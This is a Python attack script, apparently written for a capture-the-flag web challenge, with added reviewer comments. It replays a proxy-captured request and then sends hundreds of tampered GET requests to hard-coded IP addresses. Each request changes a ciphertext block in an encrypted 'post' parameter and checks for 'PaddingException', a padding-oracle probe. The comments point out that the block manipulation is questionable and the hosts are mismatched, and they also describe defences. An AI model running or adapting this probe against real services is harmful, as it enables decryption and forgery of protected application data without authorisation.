#!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
# Probe script for a web application that accepts an encrypted, base64-like
# `post` query parameter. It overwrites one 16-byte ciphertext block, resends
# the value, and inspects the response text for the strings "PaddingException"
# and "multiple".
#
# NOTE(review): the paste lost its indentation; the nesting below is
# reconstructed from statement order and should be confirmed against the
# author's copy.
# NOTE(review): the probing relies on the response body differing when padding
# is invalid. Authenticating the ciphertext before decrypting (encrypt-then-MAC
# or an AEAD mode) and returning one generic error removes that signal; a burst
# of near-identical `post` values from one client is the pattern to alert on.
import requests
import base64

# Request captured from a proxy export (burp0_* names); headers are replayed as
# captured.
burp0_url = "http://34.74.105.127/0c09509317/"
# NOTE(review): the Origin value carries a doubled "http://" and names a
# different host than the URL and Referer; it is kept exactly as pasted.
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) "
                               "Gecko/20100101 Firefox/72.0",
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                 "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
                 "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://http://35.190.155.168",
                 "Connection": "close", "Referer": "http://34.74.105.127/73294cf70f", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"title": "", "body": "kakarot"}

# Submit a post without following the redirect, so the Location header stays
# available on the response object.
# NOTE(review): no timeout is passed, so a stalled server blocks the script.
encryptedResponse = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, allow_redirects=False)
print(encryptedResponse.status_code)

# Disabled: take the ciphertext from the redirect's Location header. The
# hard-coded sample below is used instead, so the POST result is only printed.
#b64_ct_repl = (encryptedResponse.headers["Location"].split('=')[1])
b64_ct_repl = "OUe0h0AiEEILFmpWIfBJlcQ97QiZ-ugj1eeqR1xp5ToM0okTekP-oTnUlxlHwbNiiNoMbpO-" \
              "FGxy0adyND6Gy67qzL325r4pic76O5JHrih9DhUwI4xBLjp4NhGYufF7w4Y4c!bD-LvinnI7c6W" \
              "EBhxqFIZ8i7F8csn1MciP2NEgbrWx8QOFmk4uMdEUrq0!7DKKBQgkSH9PEpFHUjbu-A~~"
print("Ciphertext encoded with b64: " + b64_ct_repl)

# The value uses a substituted base64 alphabet: '~' for '=', '!' for '/',
# '-' for '+'. Map it back to standard base64 before decoding.
b64_ct = b64_ct_repl.replace('~', '=').replace('!', '/').replace('-', '+')
ct = base64.b64decode(b64_ct)

# Split into 16-byte chunks (presumably the cipher block size; the cipher is
# not identified anywhere in this script).
ct_divided = ([ct[i:i+16] for i in range(0, len(ct), 16)])
ct_numberOfBlocks = len(ct_divided)
print("Changing the second Last block to XOR that with Last decrypted "
      "block. Dont worry, decryption is handled by the server")

# Copy of the original second-to-last block; not referenced again below.
blockToChange = ct_divided[ct_numberOfBlocks-2]

# i runs over 1..253, and the guard below skips i == 1.
for i in range(1, 254):
    if i != 1:
        # Both operands are 15 zero bytes plus one trailing byte, so the XOR
        # yields 15 zero bytes followed by (i ^ 1).
        guess = bytes(15) + bytes([i])
        padding = bytes(15) + bytes([1])
        encryptedBytes = [ bytes([a ^ b]) for (a,b) in zip(guess, padding) ]

        # The whole second-to-last block is replaced, not just its last byte.
        ct_divided[ct_numberOfBlocks-2] = b''.join(encryptedBytes)
        new_ct = b''.join(ct_divided)

        # Re-encode with the application's substituted alphabet.
        postContent = base64.b64encode(new_ct)
        postContent = postContent.decode('utf-8').replace('=', '~').replace('/', '!').replace('+', '-')

        # NOTE(review): this GET goes to a different host and path than the
        # POST above — confirm both belong to the same instance. No timeout.
        burp1_url = "http://35.190.155.168/08165c13b1/?post=" + (postContent)
        pt_resp = requests.get(burp1_url, headers=burp0_headers)

        # Report only responses that do not mention a padding failure.
        if "PaddingException" not in pt_resp.text:
            print("GET URL: " + burp1_url)
            print(str(len(postContent)))
            print(pt_resp.text)
            print("For offset: " + str(i))
        # Stop at the first response containing "multiple" (the meaning of that
        # marker is not shown here — presumably a different server-side error).
        if "multiple" in pt_resp.text:
            print(pt_resp.text)
            break

# Disabled earlier experiment: fetch the unmodified ciphertext from another
# instance with its own captured headers.
# burp1_url = "http://35.190.155.168:80/b7e6c184d5/?post=" + b64_ct_repl
# burp1_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://35.227.24.107/474eb203e4/", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
# pt_resp = requests.get(burp1_url, headers=burp1_headers)
# print(pt_resp.text)